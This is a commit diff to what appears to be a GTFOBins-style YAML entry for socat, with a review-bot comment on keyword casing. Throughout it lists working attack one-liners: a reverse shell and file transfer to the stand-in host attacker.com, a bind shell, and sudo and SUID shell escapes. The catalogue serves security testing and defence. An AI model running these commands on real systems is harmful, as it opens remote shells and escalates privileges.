Improve socat

Andrea Cardaci 2020-05-13 19:36:45 +02:00
parent 0d98790312
commit 3d9370b1e4


@ -2,30 +2,18 @@
functions: functions:
shell: shell:
- code: | - code: |
socat STDIN EXEC:/bin/bash socat stdin exec:/bin/sh
reverse-shell: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
bind-shell: bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
file-upload: file-upload:
- description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file. - description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file.
code: | code: |
@ -40,4 +28,13 @@ functions:
RPORT=12345 RPORT=12345
LFILE=file_to_save LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
sudo:
- code: |
sudo socat stdin exec:/bin/sh
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
--- ---
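Review bot: The socat keyword casing is still mixed after this change: the new `shell` and `sudo` entries use lowercase `stdin exec:/bin/sh`, but the new side of `bind-shell` keeps `TCP-LISTEN:` and `EXEC:`, and its description keeps `FILE:` and `TCP:` where the `reverse-shell` description uses `file:` and `tcp-listen:`. socat matches address keywords case-insensitively, so this is purely a style point and behaviour is unchanged either way. I would lowercase the bind-shell line to `socat tcp-listen:$LPORT,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane` and adjust its description to match. The entries between the two hunks are not visible here and may need the same pass.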